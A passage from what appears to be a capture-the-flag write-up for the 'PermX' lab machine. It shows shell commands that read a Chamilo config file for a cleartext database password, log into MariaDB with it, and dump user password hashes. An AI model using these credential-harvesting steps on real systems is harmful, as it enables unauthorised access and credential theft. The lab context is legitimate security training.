MySQL
Checking web application files for MySQL credential after confirming the presence of MySQL instance
www-data@permx:/var/www/chamilo/app$ ll
total 204K
4.0K drwxr-xr-x 12 www-data www-data 4.0K Jul 8 15:16 ..
4.0K drwxr-xr-x 5 www-data www-data 4.0K Jan 20 18:20 cache
4.0K drwxr-xr-x 5 www-data www-data 4.0K Jan 20 18:20 config
4.0K drwxr-xr-x 2 www-data www-data 4.0K Jan 20 18:18 courses
4.0K drwxr-xr-x 11 www-data www-data 4.0K Aug 31 2023 .
32K -rwxr-xr-x 1 www-data www-data 32K Aug 31 2023 SymfonyRequirements.php
4.0K -rwxr-xr-x 1 www-data www-data 267 Aug 31 2023 autoload.php
104K -rwxr-xr-x 1 www-data www-data 102K Aug 31 2023 bootstrap.php.cache
4.0K -rwxr-xr-x 1 www-data www-data 3.9K Aug 31 2023 check.php
4.0K -rwxr-xr-x 1 www-data www-data 915 Aug 31 2023 console
4.0K drwxr-xr-x 3 www-data www-data 4.0K Aug 31 2023 home
4.0K drwxr-xr-x 2 www-data www-data 4.0K Aug 31 2023 logs
4.0K drwxr-xr-x 8 www-data www-data 4.0K Aug 31 2023 upload
4.0K -rwxr-xr-x 1 www-data www-data 17 Aug 31 2023 .htaccess
8.0K -rwxr-xr-x 1 www-data www-data 7.7K Aug 31 2023 AppKernel.php
4.0K drwxr-xr-x 3 www-data www-data 4.0K Aug 31 2023 DoctrineExtensions
4.0K drwxr-xr-x 3 www-data www-data 4.0K Aug 31 2023 Migrations
4.0K drwxr-xr-x 3 www-data www-data 4.0K Aug 31 2023 Resources
www-data@permx:/var/www/chamilo/app$ cd config ; ll
total 276K
4.0K drwxr-xr-x 5 www-data www-data 4.0K Jan 20 18:20 .
8.0K -rw-r--r-- 1 www-data www-data 6.4K Jan 20 18:20 auth.conf.php
4.0K -rw-r--r-- 1 www-data www-data 3.3K Jan 20 18:20 events.conf.php
4.0K -rw-r--r-- 1 www-data www-data 265 Jan 20 18:20 add_course.conf.php
128K -rw-r--r-- 1 www-data www-data 125K Jan 20 18:20 configuration.php
4.0K -rw-r--r-- 1 www-data www-data 176 Jan 20 18:20 course_info.conf.php
4.0K -rw-r--r-- 1 www-data www-data 3.4K Jan 20 18:20 mail.conf.php
4.0K -rw-r--r-- 1 www-data www-data 1.4K Jan 20 18:20 profile.conf.php
4.0K drwxr-xr-x 11 www-data www-data 4.0K Aug 31 2023 ..
4.0K -rwxr-xr-x 1 www-data www-data 265 Aug 31 2023 add_course.conf.dist.php
16K -rwxr-xr-x 1 www-data www-data 16K Aug 31 2023 assetic.yml
8.0K -rwxr-xr-x 1 www-data www-data 6.4K Aug 31 2023 auth.conf.dist.php
12K -rwxr-xr-x 1 www-data www-data 9.2K Aug 31 2023 config.yml
4.0K -rwxr-xr-x 1 www-data www-data 1.6K Aug 31 2023 config_dev.yml
4.0K -rwxr-xr-x 1 www-data www-data 622 Aug 31 2023 config_prod.yml
4.0K -rwxr-xr-x 1 www-data www-data 176 Aug 31 2023 course_info.conf.dist.php
4.0K -rwxr-xr-x 1 www-data www-data 3.3K Aug 31 2023 events.conf.dist.php
4.0K drwxr-xr-x 2 www-data www-data 4.0K Aug 31 2023 fos
4.0K -rwxr-xr-x 1 www-data www-data 2.0K Aug 31 2023 ivory_ckeditor.yml
4.0K -rwxr-xr-x 1 www-data www-data 3.4K Aug 31 2023 mail.conf.dist.php
4.0K -rwxr-xr-x 1 www-data www-data 151 Aug 31 2023 migrations.yml
4.0K drwxr-xr-x 2 www-data www-data 4.0K Aug 31 2023 mopa
4.0K -rwxr-xr-x 1 www-data www-data 1.2K Aug 31 2023 parameters.yml.dist
4.0K -rwxr-xr-x 1 www-data www-data 1.4K Aug 31 2023 profile.conf.dist.php
4.0K -rwxr-xr-x 1 www-data www-data 2.2K Aug 31 2023 routing.yml
4.0K -rwxr-xr-x 1 www-data www-data 561 Aug 31 2023 routing_admin.yml
4.0K -rwxr-xr-x 1 www-data www-data 594 Aug 31 2023 routing_dev.yml
4.0K -rwxr-xr-x 1 www-data www-data 2.2K Aug 31 2023 routing_front.yml
4.0K -rwxr-xr-x 1 www-data www-data 2.8K Aug 31 2023 security.yml
4.0K -rwxr-xr-x 1 www-data www-data 150 Aug 31 2023 services.yml
4.0K drwxr-xr-x 2 www-data www-data 4.0K Aug 31 2023 sonataconfiguration.php is the general config file for Chamilo
www-data@permx:/var/www/chamilo/app/config$ catcat configuration.php | grep -v '^#' | grep -v '^//'
[...REDACTED...]
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
$_configuration['db_manager_enabled'] = false;
[...REDACTED...]DB Credential obtained; chamilo:03F6lY3uXAP2bkW8
This credential may be checked for reuse
MariaDB
www-data@permx:/var/www$ mysql -mysql -u chamilo -p
Enter password: 03F6lY3uXAP2bkW8
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 6012
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> Authenticated
MariaDB [(none)]> shoshow databases;
+--------------------+
| Database |
+--------------------+
| chamilo |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use chamilo
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [chamilo]> show tables;
+-------------------------------------+
| Tables_in_chamilo |
+-------------------------------------+
| admin |
| [...REDACTED...] |
| user |
+-------------------------------------+
239 rows in set (0.001 sec)
MariaDB [chamilo]> select * from admin;
+----+---------+
| id | user_id |
+----+---------+
| 1 | 1 |
+----+---------+
1 row in set (0.000 sec)
MariaDB [chamilo]> select username,password,email from user;
+----------+--------------------------------------------------------------+-----------------------+
| username | password | email |
+----------+--------------------------------------------------------------+-----------------------+
| admin | $2y$04$1Ddsofn9mOaa9cbPzk0m6euWcainR.ZT2ts96vRCKrN7CGCmmq4ra | admin@permx.htb |
| anon | $2y$04$wyjp2UVTeiD/jF4OdoYDquf4e7OWi6a3sohKRDe80IHAyihX0ujdS | anonymous@example.com |
+----------+--------------------------------------------------------------+-----------------------+
2 rows in set (0.000 sec)Credential hashes obtained
Unable to crack the credential hashes